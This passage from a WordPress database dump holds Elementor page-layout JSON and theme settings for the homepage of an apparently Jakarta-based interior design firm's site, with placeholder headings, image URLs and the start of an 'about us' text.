\\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3406,4793,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3407,4793,'_elementor_pro_version','3.8.1'),(3408,4793,'_elementor_css','a:6:{s:4:\"time\";i:1685014033;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3409,4794,'_wp_page_template','elementor_header_footer'),(3410,4794,'_elementor_edit_mode','builder'),(3411,4794,'_elementor_template_type','wp-page'),(3412,4794,'_elementor_version','3.8.1'),(3413,4794,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. 